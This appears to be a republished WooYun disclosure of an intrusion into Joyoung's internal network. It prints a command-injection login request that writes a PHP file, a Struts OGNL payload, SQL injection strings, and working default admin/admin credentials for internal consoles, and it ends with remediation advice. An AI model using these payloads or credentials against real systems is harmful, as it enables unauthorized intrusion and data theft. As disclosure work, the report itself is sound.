神刀安全网

漏洞标题: 某漏洞导致的一次九阳内网漫游

漏洞详情

披露状态:

2016-01-29: 细节已通知厂商并且等待厂商处理中
2016-01-29: 厂商已经确认,细节仅向厂商公开
2016-02-08: 细节向核心白帽子及相关领域专家公开
2016-02-18: 细节向普通白帽子公开
2016-02-28: 细节向实习白帽子公开
2016-03-13: 细节向公众公开

简要描述:

修起来

详细说明:

引:

http://wooyun.org/bugs/wooyun-2010-0141195 根据之前的漏洞咯

account过滤了. password处还是没有过滤啊

code 区域
POST /ease/App/index.php/Public/dologin HTTP/1.1
Host: plmyun.joyoung.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml

+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://plmyun.joyoung.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://plmyun.joyoung.com/ease/App/index.php/Public/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=gbm15fsjqg8gc7s6ovtdm2uqo6

account=123&password=123%22%26echo '<?php phpinfo() ?>' > /var/www/cgi-

bin/yo.php%26ifconfig

%22&wdsl=adw&__hash__=c800b1c5f9c095e463c5fc8c1e4de4d3_15b9ecc9113266ac29e34a08b

f0b87b5

漏洞标题:  某漏洞导致的一次九阳内网漫游

用可新版菜刀即可支持https 老版本NO

tunnel http 反向隧道

先访问一些内部系统

漏洞标题:  某漏洞导致的一次九阳内网漫游

#1

mask 区域
1.http://**.**.**

/systeminfo?vendor=CITRIX&licenseTab=&selected=

admin/admin 虚拟化管理弱口令

漏洞标题:  某漏洞导致的一次九阳内网漫游

#2

https://172.31.1.120/appliance-overview.php

admin/admin

美国AVOCENT KVM

产品特性

MergePoint Unity交换机在单个设备中结合了 KVM over IP和串行控制台管理技术。这项独

特的结合为IT管理员提供了用于访问和控制服务器、网络设备及其他数据中心和分支办公室

设备的完整远程管理

漏洞标题:  某漏洞导致的一次九阳内网漫游

漏洞标题:  某漏洞导致的一次九阳内网漫游

#3

code 区域
Target: 

mask 区域
1.http://**.**.**/

executeSQLFileAction.action

Whoami: nt authority/system
WebPath: C:/tomcat/defalut/webapps/ROOT
OS.Name: Windows 2003
OS.Version: 5.2
Java.Home: C:/Program Files/Java/jdk1.6.0_17/jre
Java.Version: 1.6.0_17
OS.arch: x86
User.Name: SYSTEM
User.Home: C:/Documents and Settings/Default User
User.Dir: C:/WINDOWS/system32
Java.Class.Path: C:/tomcat/defalut/bin/bootstrap.jar
Java.IO.Tmpdir: C:/tomcat/defalut/temp

#4

code 区域

mask 区域
1.http://**.**.**

/jy_admin/security!login.action?redirect%3A%24%7B%23req%3D

%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest

%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext

%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get

%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C

%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush

%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

#5

mask 区域
1.http://**.**.**

/Default.aspx 运维信息平台

1'or'1'='1 存在注入

123456

漏洞标题:  某漏洞导致的一次九阳内网漫游

漏洞证明:

code 区域
http://172.31.0.111/Web/Users/login.asp

' and 1=convert(int,(select top 1 Password from Users)) --

'or'1'='1 09126970585

漏洞标题:  某漏洞导致的一次九阳内网漫游

修复方案:

1.修复入口处命令执行

2.内网常见漏洞修补. SQL注入 struts命令执行等

3.设备各种默认口令

版权声明:转载请注明来源 jianFen@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 某漏洞导致的一次九阳内网漫游

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮